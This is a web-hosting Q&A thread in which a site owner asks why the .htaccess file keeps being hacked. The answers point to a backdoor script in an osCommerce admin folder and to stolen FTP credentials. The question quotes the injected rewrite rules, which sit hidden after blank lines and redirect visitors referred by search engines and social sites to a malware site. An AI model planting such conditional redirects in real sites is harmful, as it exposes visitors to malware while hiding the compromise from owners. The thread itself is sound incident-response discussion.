.htaccess being hacked repeatedly

Question

About 4 or 5 days ago, a client came back to me saying that their site was being redirected to some other suspicious looking website from Google, Yahoo, etc., but it was working fine when the user enters the site URL in the browser address bar directly.

I tried contacting my hosting provider, but they were little to no help at first and then seemed to take forever to find out the problem.

Frustrated by the wait, I set out to find what had happened. After a little bit of trawling on Google for solutions, I found out that my .htaccess file had been hacked.

What was:

<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>

had become

<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>
//several hundred empty lines later
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ /*don't want to post the malicious URL here for fear of retaliation */[R=301,L]

Basically, the bot that hacked me seemed to write directions that all traffic coming from the important sites be redirected to the virus site.

I immediately fixed it by removing the offensive code, and felt very nice about my clever self. I also removed the .htaccess file from the main folder that is accessed by the public, and kept it one folder above, at the root. I also changed the permissions to 444, read only by anyone. I changed the passwords to my FTP access, my hosting control panel, MySQL databases, et al.

However, today the issue was back. Turns out that a NEW .htaccess file had been installed in my public_html folder, and this had only the offensive code I wrote above and nothing else.

What's going on?

I have a feeling that this is not a case of my passwords being compromised. I'm on shared hosting, and maybe someone on the same hard-disk wrote a piece of code that went about writing .htaccess files merrily to all its neighbors. Is this possible? And is there anything I can do make sure this does not happen again?

There is no way I can reinstall or do anything to the main OS of the host though...

user9517 · Answer 1 · 2010-09-24T09:25:33.490

6

Your site has been hacked. You need to wipe it and restore from a known good backup. Keep a copy of the hacked site and it's logs so that you can compare it to the good site and try to figure out how the site was compromised.

edited Sep 24 '10 at 09:25

answered Sep 24 '10 at 08:58

user9517

114,104
20
206
289

+1 Restore and rectify. – John Gardeniers Sep 24 '10 at 09:23
I'll try this, but it's going to be a pain because my site and all its subfolders together consist of 2GB :*-( – Aditya M P Sep 24 '10 at 09:39
2

Sorry, but if they're still getting in, there's a backdoor somewhere. You need to restore from a known good backup. Anything that had a password in it may very well have been copied away (hope you didn't have other user passwords) and if they installed monitoring software they could have been sniffing network traffic (if there's anything else unencrypted on the wire). – Bart Silverstrim Sep 24 '10 at 11:46

score 6 · Accepted Answer · edited Dec 12 '21 at 13:05

I found the roaches!

I did everything, including changing FTP password, hosting panel password, (painfully) wiping the whole 2GB and going through uploading it all back up, and changing database password.

They still got in.

The FTP logs showed nothing but my own actions. On top of that, the .htaccess file's last-modified-timestamp is exactly the same as my timestamp (whenever I corrected it from its repeated perversion) so there was no way to know when and how modifications took place. I guessed they were using filemtime() and touch() to do that.

It turns out the rogue files are getting in through an osCommerce installation. I do not how, but specifically, its getting through the administration area. In the admin folders, there's these foreign files called "google_analitis(sic)_somenumber". I noticed them on my main stats reader. I just looked at all the files that were being accessed (the normal logs) today, and by luck, the file got hacked again just today. I suspected there was a rogue script and lo-and-behold, these files have the spammer-stink written all over their filenames.

I opened them up and sure enough, they were up to a lot of mischief.

I just opened one of the files using the URL, and I was really surprised the amount of control these files were providing... it was a parallel control panel to the entire website!

Hope this helps someone... look at your third party apps, especially when you see a large number of unknown bots crawling up and down your site.

Did you find out how they are getting files into the osCommerce admin area ? — user9517, Oct 02 '10 at 09:34
No... that would take some time. I will find out eventually though, as soon as I get free :) — Aditya M P, Oct 02 '10 at 15:05
Any followup to this? Did you find the source of the initial break in or was the osCommerce package in need of updates or...? — Bart Silverstrim, Aug 09 '11 at 11:52
oSCommerce has (had?) an area called a "File Manager" where you could control the filesystem from and edit files. Bad idea. This was probably where they were getting in. But I've moved on, I now use OpenCart... it's plain awesome, and it kicks osc on its old, irrelevant b**t. — Aditya M P, Aug 11 '11 at 14:00

Imo · Answer 3 · 2010-09-24T09:09:39.233

0

It maybe an idea to check the FTP logs for the site, or, ask your provider to if you don't have access to them. It is quite possible that someone got your FTP details some how and updated the .htaccess file (normally they like editing index.* files). We have seen this many times with client computers being infected with a trojan or similar.

You said that you had removed the .htaccess file completely. This suggests they were able to create files. FTP access is most likely, but, also check the permissions on the primary directory (public_html) you files are in. Make sure they are not globally writable.

Generally it is not possible to edit/create files in other peoples sites on a shared server unless permissions are lax.

edited Sep 24 '10 at 09:09

answered Sep 24 '10 at 08:53

Imo

841
5
7

1

Could also be the application on your site that has been compromised. Best make sure you are running up-to-date software as well. – Imo Sep 24 '10 at 09:25
Yes, IMO, I think there is a rouge PHP file in there somewhere that's writing files of its own accord. But how could they have gotten my FTP access details, the second time? I shifted FileZilla to Kiosk Mode to get rid of all history every time I log out. Could someone be sniffing my network? – Aditya M P Sep 24 '10 at 09:36
Unless you're using FTPs/sftp/VPN FTP will transmit the username/password over the wire unencrypted, so, trivial to snoop if client machine is compromised. Have you tried virus scanning the client system? Did you check the FTP logs for access to the .htaccess file around the time it was updated/created? – Imo Sep 24 '10 at 09:46
You the man, you were right :) – Aditya M P Oct 02 '10 at 19:15
Thanks for the feedback. I've seen this a fair bit over the past few years. Not sure what virus/software snoops the data though. – Imo Jan 04 '11 at 19:28

score 0 · Answer 4 · answered Sep 24 '10 at 09:21

0

Quick patch: find every directory that has public access. Into each directory create an empty .htaccess file, change its ownership to root, make it read-only, make the directory sticky (+t) so that users can only change files they own.

Then go read some documentation on securing websites and htaccess files (hint: it might be useful to work on your apache config files and play with the various flags).

answered Sep 24 '10 at 09:21

lorenzog

2,719
1
18
24

How to change files to root on shared hosting? – Imo Sep 24 '10 at 09:22
Thanks for the early answer, but like IMO said, I can't make it accessible by root. But I definitely like the idea of "doing it before they do", I'm going to make new .htaccess files in _every_ directory of the site, and then make them read-only... let's see what happens. – Aditya M P Sep 24 '10 at 09:44
@Imo, you can always give away file ownership. Otherwise you could ask the hosting provider to provide a similar solution – lorenzog Sep 24 '10 at 14:34
Perhaps I don't understand your point but... user1$ chown root testfile\n chown: changing ownership of `testfile': Operation not permitted – Imo Sep 24 '10 at 15:33
Ok, evidently I'm not competent enough in this field. Or it's a shared hosting that I am not familiar with.. I assumed you had shell access. – lorenzog Sep 25 '10 at 17:20
@lorenz Hey man, that's okay, thanks a lot for trying to help! :) Yup, you seriously need to buy a shared hosting plan and check out how *limited* stuff is with any such service. No shell access :( – Aditya M P Oct 02 '10 at 19:14

score 0 · Answer 5 · answered Sep 08 '13 at 16:22

I had a serious problem with someone hacking into my .htaccess file and my only solution was to make the file unhackable. First, I cleaned up the .htaccess file and any PHP files of all hacks. Then I changed the file permissions to 444 (644 still allows access) on the .htaccess file. Then I used the shell access to my account to make the file "immutable", which means it cannot be changed!

When you have shell access to your account on your Linux server, enter the following: # chattr +i .htaccess

Now, even those with root access cannot change the file!

It you need to undo this, enter: # chattr -i .htaccess

If you do not have shell access to your account, ask your web host about entering this for you to make the file immutable.

For non-Linux accounts, just enter "making file immutable" into Google or Bing for your type of web server. This should give you the information you need.

Still, these are stopgap measures. The fact that your `.htaccess` file was edited without authorization is just a *symptom* of the hack. Who knows what other damage they have done to your server? — 200_success, Sep 08 '13 at 18:45

.htaccess being hacked repeatedly

5 Answers5

Linked